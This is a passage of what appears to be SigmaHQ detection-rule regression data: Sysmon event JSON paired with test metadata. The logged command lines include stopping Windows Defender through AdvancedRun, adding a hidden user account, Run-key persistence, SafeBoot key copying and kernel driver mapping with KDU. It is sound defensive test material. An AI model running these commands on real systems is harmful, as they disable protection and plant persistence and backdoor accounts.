choose.\",\n      \"Product\": \"AdvancedRun\",\n      \"Company\": \"NirSoft\",\n      \"OriginalFileName\": \"AdvancedRun.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\advancedrun-x64\\\\AdvancedRun.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\advancedrun-x64\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      
\"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096\",\n      \"ParentProcessGuid\": \"14207D89-91E9-68F9-E104-000000003F02\",\n      \"ParentProcessId\": 452,\n      \"ParentImage\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"ParentCommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml",
    "content": "id: 5f4db274-e3e6-45cd-a5a3-ef03f678dd28\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: d2b749ee-4225-417e-b20e-a8d2193cbb84\n      title: PUA - AdvancedRun Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T10:19:13.088214Z\"\n        }\n      },\n      \"EventRecordID\": 650834,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 10:19:13.085\",\n      \"ProcessGuid\": \"14207D89-0121-68FA-6E11-000000003F02\",\n      \"ProcessId\": 6448,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\advancedrun-x64\\\\AdvancedRun.exe\",\n      \"FileVersion\": \"1.51\",\n      \"Description\": \"Run a program with different settings that you choose.\",\n      \"Product\": \"AdvancedRun\",\n      \"Company\": \"NirSoft\",\n      \"OriginalFileName\": \"AdvancedRun.exe\",\n      \"CommandLine\": \"AdvancedRun.exe  /EXEFilename \\\"C:\\\\Windows\\\\System32\\\\sc.exe\\\" /WindowState 0 /CommandLine \\\"stop WinDefend\\\" /StartDirectory \\\"\\\" /RunAs 8 /Run\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\advancedrun-x64\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": 
\"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096\",\n      \"ParentProcessGuid\": \"14207D89-00ED-68FA-6611-000000003F02\",\n      \"ParentProcessId\": 700,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml",
    "content": "id: 0f52b7ec-72e4-4362-acf5-b5558ff58323\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: fa00b701-44c6-4679-994d-5a18afa8a707\n      title: PUA - AdvancedRun Suspicious Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/e76ca062-4de0-4d79-8d90-160a0d335eca.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-01-23T04:01:30.178887Z\"\n        }\n      },\n      \"EventRecordID\": 23388,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-01-23 04:01:30.177\",\n      \"ProcessGuid\": \"0197231E-F29A-6972-6716-000000000800\",\n      \"ProcessId\": 12200,\n      \"Image\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\kdu.exe\",\n      \"FileVersion\": \"1.1.1.2105\",\n      \"Description\": \"Kernel Driver Utility\",\n      \"Product\": \"KDU\",\n      \"Company\": \"UG North\",\n      \"OriginalFileName\": \"Hamakaze.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\xodih\\\\Downloads\\\\kdu.exe\\\"  -prv 1 -map MyDriver.sys\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=8ED32ACE2FBCE50296D3A1A16D963BA7,SHA256=5A08ECB2FAD5D5C701B4EC42BD0FAB7B7B4616673B2D8FBD76557203C5340A0F,IMPHASH=404E2902C47CF33EE0616252BFBCF67B\",\n      \"ParentProcessGuid\": \"0197231E-F25A-6972-5F16-000000000800\",\n      \"ParentProcessId\": 13764,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/info.yml",
    "content": "id: 199a332f-7017-4afa-81a4-407fb5cc345d\ndescription: N/A\ndate: 2026-01-23\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: e76ca062-4de0-4d79-8d90-160a0d335eca\n      title: PUA - Kernel Driver Utility (KDU) Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/e76ca062-4de0-4d79-8d90-160a0d335eca.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:35:26.043284Z\"\n        }\n      },\n      \"EventRecordID\": 256890,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:35:26.041\",\n      \"ProcessGuid\": \"5AB40FD1-400E-68F9-6331-000000003B02\",\n      \"ProcessId\": 6032,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"REG   ADD \\\"HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /V \\\"softoz\\\" /t REG_SZ /F /D \\\"C:\\\\Users\\\\admin\\\\AppData\\\\Roaming\\\\sihostt.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      
\"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml",
    "content": "id: e60e5322-dc51-4969-be3b-12caad8a9276\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: de587dce-915e-4218-aac4-835ca6af6f70\n      title: Potential Persistence Attempt Via Run Keys Using Reg.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:38:06.571958Z\"\n        }\n      },\n      \"EventRecordID\": 256915,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:38:06.570\",\n      \"ProcessGuid\": \"5AB40FD1-40AE-68F9-7631-000000003B02\",\n      \"ProcessId\": 2456,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"reg  copy hklm\\\\system\\\\CurrentControlSet\\\\services\\\\acpi hklm\\\\system\\\\CurrentControlSet\\\\control\\\\safeboot\\\\network\\\\nas /s /f\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      
\"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml",
    "content": "id: 6f781d8b-1b6c-408b-a90d-08aceb2a14d0\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: d7662ff6-9e97-4596-a61d-9839e32dee8d\n      title: Add SafeBoot Keys Via Reg Utility\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/c43a5405-e8e1-4221-9ac9-dbe3fa14e886.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-01-19T16:11:39.281042Z\"\n        }\n      },\n      \"EventRecordID\": 553,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 5928,\n          \"ThreadID\": 9720\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"DESKTOP-54JCEU5\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-01-19 16:11:39.278\",\n      \"ProcessGuid\": \"34E9093F-57BB-696E-7001-000000000300\",\n      \"ProcessId\": 4392,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.19041.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"reg  query HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Nls\\\\Language\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\marco\\\\\",\n      \"User\": \"DESKTOP-54JCEU5\\\\marco\",\n      \"LogonGuid\": \"34E9093F-54FA-696E-7C2B-070000000000\",\n      \"LogonId\": \"0x72b7c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": 
\"MD5=227F63E1D9008B36BDBCC4B397780BE4,SHA256=C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC\",\n      \"ParentProcessGuid\": \"34E9093F-57AD-696E-6E01-000000000300\",\n      \"ParentProcessId\": 12188,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"DESKTOP-54JCEU5\\\\marco\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/info.yml",
    "content": "id: 70cc76fe-3470-48ad-b15f-5714ad17a5c6\ndescription: N/A\ndate: 2026-01-19\nauthor: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)\nrule_metadata:\n    - id: c43a5405-e8e1-4221-9ac9-dbe3fa14e886\n      title: System Language Discovery via Reg.Exe\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/c43a5405-e8e1-4221-9ac9-dbe3fa14e886.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-31T05:06:45.367278Z\"\n        }\n      },\n      \"EventRecordID\": 657153,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3080,\n          \"ThreadID\": 4948\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-31 05:06:45.364\",\n      \"ProcessGuid\": \"14207D89-43E5-6904-4506-000000004002\",\n      \"ProcessId\": 5244,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"REG  ADD \\\"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist\\\" /v AtomicOperator$ /t REG_DWORD /d 0\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-34DD-6904-8287-190000000000\",\n      \"LogonId\": 
\"0x198782\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860\",\n      \"ParentProcessGuid\": \"14207D89-43E5-6904-4106-000000004002\",\n      \"ParentProcessId\": 6656,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"cmd.exe\\\" /c NET USER AtomicOperator$ At0micRedTeam! /ADD /expires:never  & REG ADD \\\"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist\\\" /v AtomicOperator$ /t REG_DWORD /d 0\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml",
    "content": "id: de8dc72e-19eb-465a-83ac-59545ae56426\ndescription: N/A\ndate: 2025-10-31\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 9ec9fb1b-e059-4489-9642-f270c207923d\n      title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:26:58.441823Z\"\n        }\n      },\n      \"EventRecordID\": 256793,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:26:58.421\",\n      \"ProcessGuid\": \"5AB40FD1-3E12-68F9-1A31-000000003B02\",\n      \"ProcessId\": 6856,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-AdFind.exe\",\n      \"FileVersion\": \"1.52.0.5064\",\n      \"Description\": \"-\",\n      \"Product\": \"AdFind\",\n      \"Company\": \"www.joeware.net\",\n      \"OriginalFileName\": \"AdFind.exe\",\n      \"CommandLine\": \"renamed-AdFind.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"MD5=12011C44955FD6631113F68A99447515,SHA256=C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3,IMPHASH=12CE1C0F3F5837ECC18A3782408FA975\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/info.yml",
    "content": "id: 09eb713e-f4b1-42ce-9c8e-d446ba0d548a\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: df55196f-f105-44d3-a675-e9dfb6cc2f2b\n      title: Renamed AdFind Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:29:25.275782Z\"\n        }\n      },\n      \"EventRecordID\": 256823,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:29:25.272\",\n      \"ProcessGuid\": \"5AB40FD1-3EA5-68F9-2F31-000000003B02\",\n      \"ProcessId\": 4564,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-netsh.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Network Command Shell\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"netsh.exe\",\n      \"CommandLine\": \"renamed-netsh.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
